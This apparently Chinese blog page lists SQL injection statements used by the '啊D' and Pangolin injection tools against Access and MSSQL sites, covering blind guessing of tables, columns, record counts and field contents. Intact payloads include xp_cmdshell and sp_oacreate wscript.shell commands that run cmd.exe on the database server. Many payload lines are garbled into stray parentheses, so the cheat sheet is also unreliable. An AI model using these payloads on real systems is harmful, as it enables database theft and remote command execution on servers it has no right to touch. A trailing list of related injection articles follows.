啊D注入工具中使用的SQL注入语句

爆user
))   )= | *****
?Id)) 

 : ?Id

:   Id
检查SA权限:))))

爆当前库: )) --

检查是否为mssql数据库:and exists (select * from sysobjects)
(*%20from%20sysobjects)

判断表名:
panolin: ?Id
  admin也可以编码:%6E

啊D:?Id([admin])

爆列名:
啊D:([admin]) 

panolin:    

判断记录数:
  ()
判断admin表中有几个记录 如: cstr() 转换成字符型就是"" 那么他的长度就是2,所以这里

阿D: ()) 判断在0-9999之间,这句是判断在0-8之间

(,))))
记录数的第一位 也就是0
(,))))
记录数的第二位 也就是1  所以

猜字段长度:
Article.asp?Id((())  第一条记录的字段长度
                                                                                                                   第一条
Article.asp?Id((())  第二条记录的字段
                                                                                                                    第二条
阿D:
       Article.asp?Id(( 判断第一条记录的字段长度0-32之间
                                                                                        第二条
       Article.asp?Id(( 判断第二条记录的字段长度0-32之间
两个top  保留一个top  ,改另外一个成top x 就可以猜第x个字段长度 或改最后一个top (pangolin就是改最后一个top来爆第N杀记录的长度)

猜字段内容:
(,)))(()) 第一条记录、第一位的asc码
(,)))(()) 第19位的asc码

阿D:
(,))( 第一条记录、第7位的asc码在30~80之间
                                                                                              第一条
                                                                                               第二条
(,))( 第二条记录、第7位的asc码在30~80之间

猜中文:
    (,)))) 第一个列的内容是不是》
(,)))) 第二个列是不是》

检查数据库中有多少个库:)) ))) ) )

爆第一个库:  ))  )   --

爆第N个库: )) )   --

爆有多少个列名:))))  id )))))))))

爆列名: ))   id ))))))))  --

读注册表:
))--

) ',@result);--

)) )))  --

执行CMD

),ID ,)) insert D99_CMD exec master.dbo.xp_cmdshell 'dir c:\'--

)))) --

执行WSCRIPT:

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --

恢复XP_CMDSHELL

;exec master..sp_dropextendedproc 'xp_cmdshell'--

啊D工具语句 适合Access和Mssql注入的更多相关文章

  1. ACCESS与MSSQL比较:SQL语句关于时间格式使用的注意点

    ACCESS与MSSQL比较:SQL语句关于时间字符串的使用:ACCESS数据库使用 # 来控制时间格式字符串:mssql数据库使用单引号 ' 来控制时间格式字符串.例: ACCESS版本:UPDAT ...

  2. Web渗透测试(sql注入 access,mssql,mysql,oracle,)

    Access数据库注入: access数据库由微软发布的关系型数据库(小型的),安全性差. access数据库后缀名位*.mdb, asp中连接字符串应用-- "Driver={micros ...

  3. MSSQL注入常用SQL语句整理

    很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句. 手工MSSQL注入常用SQL语句 and exists (select * from ...

  4. Oracle客户端工具出现“Cannot access NLS data files or invalid environment specified”错误的解决办法

    Oracle客户端工具出现"Cannot access NLS data files or invalid environment specified"错误的解决办法 方法一:参考 ...

  5. (转载)用SQL语句创建Access表

    <来源网址:http://www.delphifans.com/infoview/Article_220.html>用SQL语句创建Access表 很久以前弄的,用了一天的时间,没有什么技 ...

  6. 渗透测试学习 九、 MSsql注入上

    MSsql注入漏洞详解 (Asp.Aspx站,常见于棋牌网站.考试网站.大学网站.政府网站.游戏网站.OA办公系统) 大纲:msSQL数据库调用分析 msSQL注入原理 msSQL注入另类玩法 msS ...

  7. (非原)SQL注入专题--整理帖 && like 语句拼sql 如何防止注入攻击。

    原地址:blog.csdn.net/lvjin110/article/details/28697695 like 语句拼sql 如何防止注入攻击?http://bbs.csdn.net/topics/ ...

  8. MSSQL注入:显错注入及反弹注入

    前言: MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路. MSSQL的显错注入操作: 以联合查询为例: 猜 ...

  9. Access数据库及注入方法

    目录 Access数据库 Access数据库中的函数 盲注Access数据库 Sqlmap注入Access数据库 Access数据库 Microsoft Office Access是由微软发布的关系数 ...

随机推荐

  1. Java字符串格式化String.format常用用法

    常规的格式化 String类的format()方法用于创建格式化的字符串以及连接多个字符串对象.熟悉C语言的同学应该记得C语言的sprintf()方法,两者有类似之处.format()方法有两种重载形 ...

  2. guacamole 0.9.9安装与配置

    以下命令很多都需要管理权限,建议使用管理员账号执行,遇到问题可以留言. 1.首先需要安装guacamole所需要的依赖库 必需安装的库有:Cairo.libjpeg-turbo.libpng.OSSP ...

  3. iphone 使用 soap 服务 介绍

    iphone 使用 soap 服务 介绍 目前比较常用的有几个办法: 1. WSDL to Objective C自动根据wsdl文件生成ios可以直接调用的Objective-C (Cocoa) 代 ...

  4. Smtp邮件发送系统公用代码整理—总结

    1.前言 a.在软件开发中,我们经常能够遇到给用户或者客户推送邮件,推送邮件也分为很多方式,比如:推送一句话,推送一个网页等等.那么在系统开发中我们一般在什么情况下会使用邮件发送呢?下面我简单总结了一 ...

  5. 快速理解JS的闭包

    /**闭包:1.在函数内部改变变量值,不影响函数外全局变量(相当于JAVA中私有变量)*        2.调用闭包后,最后产生的变量值并不释放.*        3.任何人调用闭包,闭包里面的值并不 ...

  6. JavaScript基础13——js的string对象

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  7. SAP debug的几种方式

         1. 直接在程序中设断点 这种方式想必大家都知道了,在se38里面打上breakpoint,程序运行到该处即进入debug模式   2.background Job的debug 进入SM37 ...

  8. Arcengine实现创建网络数据集札记(二)

    四 ArcEngine实现创建网络数据集 ArcEngine创建网络数据集的过程,与ArcMap设置的过程类似,主要通过六个步骤即可以实现. 1 定义网络数据集对象,并设置基本属性,包括网络数据集名称 ...

  9. 安卓开发_浅谈Service

    一.Service(服务) Service是Android程序中四大基础组件之一,它和Activity一样都是Context的子类,区别在于它没有UI界面,是在后台运行的组件. public abst ...

  10. 解决Spring4 MVC请求json数据报406错误

    解决方法一: 1.导入jackson-core-2.5.1.jar和jackson-databind-2.5.1.jar 2.Spring配置文件添加: <!-- 避免IE执行AJAX时,返回J ...